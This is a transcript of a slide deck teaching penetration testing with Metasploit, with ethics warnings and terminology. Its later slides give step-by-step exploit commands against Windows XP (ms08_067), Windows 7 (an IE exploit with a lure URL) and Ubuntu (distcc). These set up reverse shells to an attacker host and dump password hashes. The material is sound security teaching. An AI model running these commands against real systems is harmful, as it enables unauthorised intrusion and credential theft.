Pen-Testing with Metasploit
-
Upload
mohammed-danish-amber -
Category
Software
-
view
245 -
download
3
description
Transcript of Pen-Testing with Metasploit
Pen-Testing With Metasploit
By - Mohammed Danish Amber
AGENDA
▪ Why & What's Pen-Testing
▪ About Metasploit
▪ Metasploit Basic & Meterpreter
▪ Demo
Mohammed Danish Amber
▪ Geek & Security Analyst
▪ Information Security Enthusiast
▪ Working in TCS
▪ Lecturer & Engineer
▪ Collaborative Project - Hacker Ecosystem
▪ Make Internet a Secure Place
Why Pen-Testing
▪ Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches
▪ Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs
What's Pen-Testing
▪ A method to evaluate the security of computer system / network
▪ Practice ( attacking ) an IT System like a ‘hacker’ does– Find security holes (weaknesses)
– Bypass security mechanism
– Compromise an organization’s IT system security
MUST HAVE PERMISSION FROM IT SYSTEM OWNER
ILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
ETHICS
▪ THINK BEFORE YOU ACT
▪ DON'T BE STUPID
▪ DON'T BE MALICIOUS
PEN-TESTING PHASES
INFORMATION GATHERING
VULNERABILITY ANALYSIS
EXPLOITATIONPOST
EXPLOITATIONREPORTING
Metasploit
▪ Not Just A Tool but an entire framework
▪ An Open Source platform for writing security tools and exploits
▪ Easily build attack vectors to add it's exploits, payloads, encoders.
▪ Create and execute more advanced attack
▪ Ruby based
Metsaploit Interface
▪ MSFconsole
▪ msfweb, msfgui (discontinued)
▪ Metasploit Pro & Community Edition
▪ Armitage
MSFconsole
MSFcli
Metasploit Terminology
▪ Exploit: Code that allow a pentester take some advantages of a flaw within system,application, or service
▪ Payload: Code that we want the target system to execute (few commands to be executed on the target system)
▪ Shellcode: A set of instructions used as payload when exploitation occurs
▪ Module: A software that can be use by metasploit
▪ Listener: A component waiting for incoming connection
How does Exploitation works
Att
acke
rSends: Exploit + Payload
Upload + download DATA
Vu
lner
able
Ser
ver
Exploit run + Payload run
Meterpreter
▪ As a payload after vulnerability is exploited
▪ Improve the post exploitation
Meterpreter
Exploiting a vulnerability
Select a meterpreter as a payload
Meterpreter shell
Metereperter Commands
Metereperter Commands
Metereperter Commands
Metereperter Commands
Metereperter Commands
Windows XP Exploitation
▪ msf > search windows/smb
▪ msf > info exploit/windows/smb/ms08_067_netapi
▪ msf > use exploit/windows/smb/ms08_067_netapi
▪ msf exploit(ms08_067_netapi) > show payloads
▪ msf exploit(ms08_067_netapi) > set PAYLOAD
▪ windows/meterpreter/reverse_tcp
▪ msf exploit(ms08_067_netapi) > show options
▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip>
▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip>
▪ msf exploit(ms08_067_netapi) > show options
▪ msf exploit(ms08_067_netapi) > exploit
▪ meterpreter > background
▪ session -l
Windows XP Exploitation
▪ session -i 1
▪ meterpreter > getsystem -h
▪ getuid
▪ hashdump
Windows 7 Exploitation
▪ msf > use exploit/windows/browser/ms11_003_ie_css_import
▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
▪ msf exploit(ms11_003_ie_css_import) > show options
▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <victim ip>
▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe
▪ msf exploit(ms11_003_ie_css_import) > set LHOST <victim ip>
▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443
▪ msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim open the url http://<victim ip>:80/free_iphon6plus.exe
Windows 7 Exploitation
▪ msf exploit(ms11_003_ie_css_import) > sessions -l
▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1
▪ meterpreter > sysinfo
▪ meterpreter > shell
Ubuntu Exploitation
▪ search distcc
▪ use exploit/unix/misc/distcc_exec
▪ show payloads
▪ set PAYLOAD cmd/unix/reverse
▪ show options
▪ set rhost <victim ip>
▪ set lhost <attacker ip>
Any Questions?
Thanks To
▪ Kali / BackTrack Linux
▪ Metasploit Team (HD Moore & rapid7)
▪ Offensive Security / Metasploit Unleashed
▪ David Kennedy
▪ Georgia Weidman
▪ Null Hyderabad Chapter - CORE TEAM
▪ #nullhyd @nullhyd
WWW.MOHAMMEDDANISHAMBER.COM